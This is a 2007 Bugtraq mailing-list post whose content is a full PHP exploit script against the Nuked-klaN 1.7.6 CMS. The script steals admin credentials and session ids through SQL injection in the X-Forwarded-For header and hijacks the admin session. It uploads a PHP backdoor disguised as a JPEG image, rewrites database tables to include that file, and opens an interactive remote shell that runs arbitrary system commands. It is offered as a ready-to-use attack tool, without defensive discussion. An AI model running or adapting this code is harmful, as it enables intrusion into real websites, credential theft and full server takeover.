[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070505155651.15231.qmail@securityfocus.com>
Date: 5 May 2007 15:56:51 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: Nuked-klaN 1.7.6 Remote Code Execution Exploit
<?php
#
# Nuked-klaN 1.7.6 Remote Code Execution Exploit
# ------------------------------------------------
# Author: DarkFig <gmdarkfig@...il.com>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class.
require("phpsploitclass.php"); # If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # url
$prx = ''; # proxy <proxyip>:<proxyport>
$pra = ''; # basic authentification <proxyuser:proxypwd>
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);
$config = array();
$config[] = 'nuked'; # table prefix
$config[] = 'nuked'; # cookie prefix
$config[] = 'ORDER by date LIMIT 1'; # sql conditions
$config[] = 'HAK'; # match, length <= 3
$config[] = '<?php'."\n" # php code
.'error_reporting(0);'
.'if(isset($_SERVER[HTTP_SHELL]))'
.'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}'
.'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';
$request = array();
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'";
$request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'";
$request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'";
for($i=0;$i<count($request);$i++)
{
$deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT(";
$sql = $deb.$request[$i]."))) #";
$xpl->addheader("X-Forwarded-For",$sql);
$xpl->get($url);
$xpl->reset('header');
}
if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches))
die("Exploit Failed");
$what = array("login","passwd","user_id","session");
for($i=0;$i<count($what);$i++)
print "\n".$what[$i]." -> ".$matches[2][$i];
if(empty($matches[2][3]))
exit("\nNo session found");
# Logged in as admin
$name = array("admin_session","user_id","sess_id");
$xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]);
$phpc = array(
frmdt_url => $url.'?file=User&op=update_pref',
'fichiernom' => array(frmdt_filename => '1.jpg',
frmdt_content => $config[4]));
$xpl->addheader('Referer',$url);
$xpl->formdata($phpc);
$xpl->get($url.'?file=User&op=edit_pref');
if(!preg_match('#\<input name=\"photo\" value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found");
else print "\n\$shell> ";
$sql = array();
$sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/
$sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;";
$sql[] = "DELETE FROM $config[0]_nbconnecte;";
for($i=0;$i<count($sql);$i++)
$xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]);
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
# 0'); include('./conf.inc.php'); print $global['db_pass']; //
$xpl->reset('header');
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($url);
$data = explode('123456789',$xpl->getcontent());
print $data[1]."\n\$shell> ";
}
function char($data)
{
$char='CHAR(';
for($i=0;$i<strlen($data);$i++)
{
$char .= ord($data[$i]);
if($i != (strlen($data)-1)) $char .= ',';
}
return $char.')';
}
?>
Powered by blists - more mailing lists